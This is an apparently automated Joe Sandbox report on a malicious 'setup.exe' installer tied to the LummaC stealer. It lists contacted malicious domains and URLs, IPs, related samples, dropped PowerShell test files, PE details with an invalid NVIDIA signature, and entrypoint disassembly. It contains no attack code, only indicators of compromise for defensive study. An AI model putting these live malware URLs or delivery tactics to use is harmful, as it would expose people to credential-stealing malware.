                                                    https://fairiespar.cyou:443/apiocalsetup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0setup.exefalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.1515220136.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1515220136.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://x1.c.lencr.org/0setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://x1.i.lencr.org/0setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://fairiespar.cyou/hortpsetup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400809409.0000000003E6C000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400573113.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://fairiespar.cyou/:zsetup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://crl.starfieldtech.com/repository/sfsroot.crl0Psetup.exefalse
                                                                		high
                                                                https://support.mozilla.org/products/firefoxgro.allsetup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1515220136.0000000004ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    Http://Www.SkyGz.Comsetup.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://klipvumisui.shop/int_clp_sha.txtsetup.exe, 00000000.00000002.1508611151.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.innosetup.com/setup.exefalse
                                                                        		high
                                                                        https://fairiespar.cyou/setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://fairiespar.cyou/apierssetup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosetup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://fairiespar.cyou/pisetup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://ocsp.thawte.com0setup.exefalse
                                                                            		high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cegu.shop/8574262446/ph.txt?setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://fairiespar.cyou/let_setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://ocsp.rootca1.amazontrust.com0:setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://certificates.starfieldtech.com/repository/1604setup.exefalse
                                                                                    		high
                                                                                    https://www.ecosia.org/newtab/setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.symauth.com/cps0(setup.exefalse
                                                                                        		high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://fairiespar.cyou/XBWQPeasetup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://klipvumisui.shop/setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://ac.ecosia.org/autocomplete?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://klipvumisui.shop/int_clp_sha.txtIesetup.exe, 00000000.00000003.1507348456.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508941560.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              http://crl.starfieldtech.com/repository/0setup.exefalse
                                                                                                		high
                                                                                                http://www.remobjects.com/psUsetup.exefalse
                                                                                                  		high
                                                                                                  http://www.symauth.com/rpa00setup.exefalse
                                                                                                    		high
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://fairiespar.cyou/wsetup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://fairiespar.cyou:443/apiwssetup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://klipvumisui.shop/)setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://fairiespar.cyou/usetup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.remobjects.com/pssetup.exefalse
                                                                                                        		high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://dfgh.online/invoker.php?compName=hZpowershell.exe, 0000000A.00000002.1515220136.00000000051A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          188.114.97.3
                                                                                                          		fairiespar.cyouEuropean Union
                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                          185.161.251.21
                                                                                                          		cegu.shopUnited Kingdom
                                                                                                          		5089NTLGBfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1585368
                                                                                                          Start date and time:2025-01-07 15:25:12 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 6m 21s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:15
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:setup.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/3@3/2
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 8
                                                                                                          • Number of non-executed functions: 5
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                                                                          • Execution Graph export aborted for target setup.exe, PID 5916 because there are no executed function
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: setup.exe

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          09:26:18API Interceptor9x Sleep call for process: setup.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          188.114.97.3DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.uzshou.world/ricr/
                                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                          Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                          • /api/get/free
                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                          • /api/get/free
                                                                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.rgenerousrs.store/o362/
                                                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.beylikduzu616161.xyz/2nga/
                                                                                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                          ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/lxvbq
                                                                                                          185.161.251.21'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            cegu.shop'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://ipfs.io/ipfs/bafybeifkk7tuizumzirz7qfuxbcoggonud2b6gcvttaa7ewfdgltpybls4/index1.html?err=KHPGKXW3AEO13L6ZGUK&dispatch=B34&id=2849c1C900c31C62B159B3002c63C5#engineering@vanas.euGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.24.14
                                                                                                                            'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.25.52
                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.25.52
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            te13.exeGet hashmaliciousMetasploitBrowse
                                                                                                                            • 104.21.16.1
                                                                                                                            New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            NTLGB'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 86.15.78.37
                                                                                                                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 194.168.231.153
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            64pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21
                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            • 185.161.251.21

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.7307872139132228
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlllul4/X:NllU4/
                                                                                                                            MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                                                                            SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                                                                            SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                                                                            SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:@...e.................................,.........................

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cip1fhdl.bla.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udqh5qon.gf5.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):0.4402487451613905
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:setup.exe
                                                                                                                            File size:74'584'760 bytes
                                                                                                                            MD5:76f2e89ace5c9b36679ce13b57c8b752
                                                                                                                            SHA1:736b004b46dfb5d0fef7758406883a22f15b1649
                                                                                                                            SHA256:16c3793c3deafcfb489b2347d08bfd0a420ce0f8c27dd4afeea05d9d9a99f413
                                                                                                                            SHA512:b7f872efbae47b45e72e4f05ef46d17506f117019b2fabd78e0a672f3ebc3ce924986ddceaae900afbb85382041d8bc8cf50f8cb5ef798796b89c768b6283a3a
                                                                                                                            SSDEEP:24576:2+QSkqgnQNDa5lZeGvyErqPW+UHx+/uxVrwiFx7ssa+7:27XqdG7qw3VrTFpsP
                                                                                                                            TLSH:F6F77DED6F1022E187CBEFEDE91293C9F9D85102231116FF239B054AD5EAED84232D59
                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x49b840
                                                                                                                            Entrypoint Section:CODE
                                                                                                                            Digitally signed:true
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:1
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:1
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:1
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:c1220b6b9a0c9ddea463bab3a99b594f

                                                                                                                            Authenticode Signature

                                                                                                                            Signature Valid:false
                                                                                                                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                            Error Number:-2146869232
                                                                                                                            Not Before, Not After
                                                                                                                            • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                            Subject Chain
                                                                                                                            • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                            Version:3
                                                                                                                            Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                            Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                            Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                            Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            add esp, FFFFFFF4h
                                                                                                                            push ebx
                                                                                                                            push esi
                                                                                                                            push edi
                                                                                                                            call 00007FBC34A5B463h
                                                                                                                            call 00007FBC34A5D732h
                                                                                                                            call 00007FBC34A5E3E9h
                                                                                                                            call 00007FBC34A61A7Ch
                                                                                                                            call 00007FBC34A61CABh
                                                                                                                            call 00007FBC34A68A82h
                                                                                                                            call 00007FBC34A68AF5h
                                                                                                                            call 00007FBC34A6AA40h
                                                                                                                            call 00007FBC34A710DFh
                                                                                                                            call 00007FBC34A7CF56h
                                                                                                                            call 00007FBC34A8751Dh
                                                                                                                            call 00007FBC34A88A80h
                                                                                                                            call 00007FBC34AA4AAFh
                                                                                                                            call 00007FBC34AAA652h
                                                                                                                            call 00007FBC34AAAAF1h
                                                                                                                            call 00007FBC34AAC4B0h
                                                                                                                            call 00007FBC34AADEA3h
